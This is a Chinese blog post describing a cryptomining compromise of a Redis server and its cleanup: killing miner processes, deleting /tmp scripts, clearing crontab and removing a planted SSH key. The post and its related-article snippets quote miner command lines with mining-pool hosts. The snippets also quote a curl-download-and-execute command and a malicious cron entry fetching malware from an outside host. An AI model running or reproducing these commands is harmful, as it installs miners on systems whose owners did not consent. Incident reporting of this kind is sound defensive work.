记录一次redis被挖矿 ./redis2 --donate-level 1 -o ve01.kieuanilam.me:5555 -u n7re -p n7re -k -B

最新推荐文章于 2024-03-20 04:52:27 发布
最新推荐文章于 2024-03-20 04:52:27 发布
阅读量1k 收藏
点赞数
分类专栏: redis 文章标签: redis linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dingchaochao_9110/article/details/108735090
版权

今天在用系统测试,然后又双叒叕运行异常了,看到后台又是redis连接超时,已经连着好几天都是这个错了,然后登录portainer查看,进入redis容器输入redis-cli竟然也是连接超时,无意中点了看了下stats,有一行命令是./redis2 --donate-level 1 -o ve01.kieuanilam.me:5555 -u n7re -p n7re -k -B,很奇怪的命令,问了开发群好像也没人敲这行命令,于是赶忙先重启了redis,然后去找度娘,历经艰辛总算找到有个大哥的博客:腾讯云服务器上挖矿程序处理记录https://blog.csdn.net/wddddddsd/article/details/104734999,情况完全相同,也是有个未知的redis2进程,不过可不是仅仅杀掉那么简单,我照的大哥的步骤找到了包含redis2的路径,不过find / -name redis 不行,要用locate redis2,我不知道为什么,进去tmp文件夹下确实有backup.db的脚本,有几行不知道哪里的ip地址

胆战心惊,立马删掉tmp文件夹,还没完。而且那些可疑的进程redis2、kinsing、kdev竟然杀不掉,接着找度娘,找到另一篇博客:记一次服务器被挖矿程序占用的解决过程

https://blog.csdn.net/dabao87/article/details/81302991 ,照着做,crontab -l 清掉定时任务,然后进入.ssh再删除authorized_keys,坏人留下的公钥,这才清除完了。redis安全应当重视,设密码!设密码!设密码!

dingchaochao_9110
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Linux病毒】./xr -o lplp.ackng.com:444 --opencl --donate-level=1 --nicehash -B
BIG BOSS的博客
02-03 737
可能是在linux上安装pgadmin4时引入的病毒 删除,重装虚拟机。。。
《应急响应》记一次“XMR门罗币挖矿木马病毒”处置
1
11-03 2178
故事的起因于26号下午做渗透测试时,登录跳板机发现CPU进程拉满到200%,qiao哥看了一眼直接说是XMR挖矿,这句话勾引起我的兴趣,由于应急是我的薄弱项也没有时间深入学习,所以有本篇应急分析文章。
记录一次watchdog被挖矿
buzenmedi的专栏
06-29 640
突然发现机器cpu很高,一看cpu飙到60% 查了一下进程发现可疑的进程,给干掉了,cpu恢复正常 bash -c curl https://whatsmyipv4.cf/xmrig -o /tmp/watchdog && chmod +x /tmp/watchdog && nohup /tmp/watchdog --donate-level 1 -o sg.minexmr.com:443 -u 44BwEPy6EAHMgi7x2SXq1v3kdokMgKFvxf
云主机发现主机CPU使用率很高:./trace -r 2 -R 2 --keepalive --max-cpu-usage 80 --cpu-priority 3
徊忆羽菲
12-15 1257
云主机发现主机CPU使用率很高:./trace -r 2 -R 2 --keepalive --no-color --donate-level 1 --max-cpu-usage 80 --cpu-priority 3 今天登陆了共有云主机发现主机CPU使用率很高,top命令查看,发现有两个trace进程占用CPU超级高。 通过ps -ef|grep trace查看到两条trace进程,这里截取...
ZEPH教程+RandomX优化
qq_44946696的博客
03-20 919
xmrig.exe -u -p yjsnpi -o hk.zephyr.herominers.com -a rx/0 -k -t 32 打开策略组编辑器,依次打开`计算机配置 > Windows设置 > 安全设置 > 本地策略 > 用户权限分配`,找到`锁定内存页`,填入`Everyone`,点击“确定”应用更改后重启即可。 重启后右键`xmrig.exe`,点击`属性 > 兼容性`,勾选“以管理员身份运行此程序”
redis5离线安装文件包,包含redis-5.0.14.tar.gz和redis-4.6.0.gem
06-10
sudo gem install -l ./redis-3.2.1.gem port 6379 daemonize yes #bind自己的ip bind 192.168.129.101 protected-mode no #启用集群 cluster-enabled yes cluster-config-file nodes-7000.conf #先启动各节点 #...
redis-5.0.3.tar.gz + redis-5.0.4.tar.gz + redis-5.0.5.tar.gz
05-05
其中包含:redis-5.0.3.tar.gz + redis-5.0.4.tar.gz + redis-5.0.5.tar.gz 以及。。。 一个redis的下载地址,各版本可选。 以及…… 可以思考下收藏这个网站,见压缩包。
redis-stack-server 7.2.0 安装包合集
最新发布
04-03
redis-stack-server-7.2.0-v9.arm64.snap redis-stack-server-7.2.0-v9.bionic.arm64.tar.gz redis-stack-server-7.2.0-v9.bionic.x86_64.tar.gz redis-stack-server-7.2.0-v9.bullseye.x86_64.tar.gz redis-stack-...
redis-5.0.14-1.el7.remi.x86-64.rpm安装包(含有部署手册)
06-26
redis-5.0.14-1.el7.remi.x86_64.rpm安装包(含有部署手册) redis-5.0.14-1.el7.remi.x86_64.rpm安装包(含有部署手册) redis-5.0.14-1.el7.remi.x86_64.rpm安装包(含有部署手册) redis-5.0.14-1.el7.remi.x86_64.rpm...
redis-5.0.12-1.el7.x86_64.rpm
07-19
redis 5.0.12的rpm包
一次被注入挖矿程序kdevtmpfi解决记录
但行好事,莫问前程
02-05 4816
前言 发现自己服务器资源使用异常,cpu使用率100%,内存使用也很多,且有陌生的进程。那很有可能是被入侵植入了挖矿程序 解决问题 遇到这种问题切忌惊慌失措,一般挖矿程序除了占用服务资源不会有其他危害 1. 切断来源 一般被侵入的话,服务器上的计划任务会被修改,会有一个进程一直在检测程序是否存在,如果只kill进程删除文件的话会发现过不了一会就会死灰复燃,所以斩草除根,先把去外界不安全的连接关掉。 被修改的计划任务如curl -o /tmp/kinsing http://45.137.155.5.
linux的Systemctl挖矿病毒清扫
m0_37922496的博客
09-10 3626
问题描述 服务器被感染了病毒,伪装成合法进程使用浪费cpu算力 在服务器中目前发现机器下面有两种可能存在的进程 一种是top种存在进程 69259 huawei 20 0 2420084 315660 2532 S 1199 1.0 135726:38 syst3md 另一种是存在进程 13614 huawei 20 0 7210224 4.586g 7896 S 2794 1.8 303625:06 cnrig 如图所示 服务中存在进程占满12核的CPU,显示的进程
libgcc_a挖矿木马应急响应及分析
weixin_40642404的博客
05-19 2682
libgcc_a挖矿木马应急响应及分析
云主机发现主机CPU使用率很高:./trace -r 2 -R 2 --keepalive --no-color --donate-level 1 --max-cpu-usage 80 --cpu-p
kewen_123的博客
06-10 480
今天登陆了共有云主机发现主机CPU使用率很高,top命令查看,发现有两个trace进程占用CPU超级高。 通过ps -ef|grep trace查看到两条trace进程,这里截取其中一条如下:./trace -r 2 -R 2 --keepalive --no-color --donate-level 1 --max-cpu-usage 100 --cpu-priority 3 --print-time 25 --threads 2 --url monerohash.com:2222 --user 45F.
清除Linux centOS7挖矿病毒
李嘉图呀李嘉图的博客
05-18 771
由于最近准备面试,所以想要在买的阿里云服务器上部署下自己的项目,发布项目到服务器上之后项目一直崩溃,一看top,有一个exin的进程占了99% 未明确该应用如何被安装到了服务器上,可能是因为docker下载其他镜像文件时,病毒被一并安装。 先杀进程(kill该进程之后i一小时之后进程会重新打开,光杀进程不够) kill -9 26136 找到运行的进程,确定进程位置为 /bin/exin $ ps -a |grep 进程号 删除程序,直接删除不成功,必须先执行 chattr -ia
关于linux遭受挖矿病毒,伪装为trace
麋鹿迷了路~
01-04 2788
前几天两台线上的centos7遭遇了挖矿病毒 每天的cpu都是跑满的状态 进程名为:trace 实际文件名为:xmrig 捋一下处理流程: 看看一下进程号。然后 ls -l /proc/进程号/exe 看一下启动程序的路径 然后发现在/home下 home下有程序及启动的脚本 然后把程序及脚本取消掉执行权限 就放下了。 结果第二天他还跑起来了,之后我把文件删除,...
polkitd进程解释
热门推荐
前方的路在刚开始
01-14 1万+
今天想kill -9redis 杀不掉 然后发现 这个是属于服务器方法,可以了解一下supervisor,将需要自启动的程序加入到supervisor的启动配置,只要supervisor不停止,那么监控进程就会一直运行,并且如果出现关闭情况也会被立即重启。 ...
jenkins被monerohash.com挖矿处理过程
宫凯宁的博客
10-28 1337
今天登陆了共有云主机发现主机CPU使用率很高,top命令查看,发现有两个trace进程占用CPU超级高。 通过ps -ef|grep trace查看到两条trace进程,这里截取其中一条如下: ./trace -r 2 -R 2 --keepalive --no-color --donate-level 1 --max-cpu-usage 100 --cpu-priority 3 --print-...
给这段配置文件添加注释services: ruoyi-redis: container_name: ruoyi-redis image: redis build: context: ./redis ports: - "9063:6379" volumes: - ./redis/conf/redis.conf:/home/ruoyi/redis/redis.conf - ./redis/data:/data command: redis-server /home/ruoyi/redis/redis.conf
06-09
- ./redis/conf/redis.conf:/home/ruoyi/redis/redis.conf # Redis配置文件映射 - ./redis/data:/data # Redis数据目录映射 command: redis-server /home/ruoyi/redis/redis.conf # 启动Redis服务的命令 ``` ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值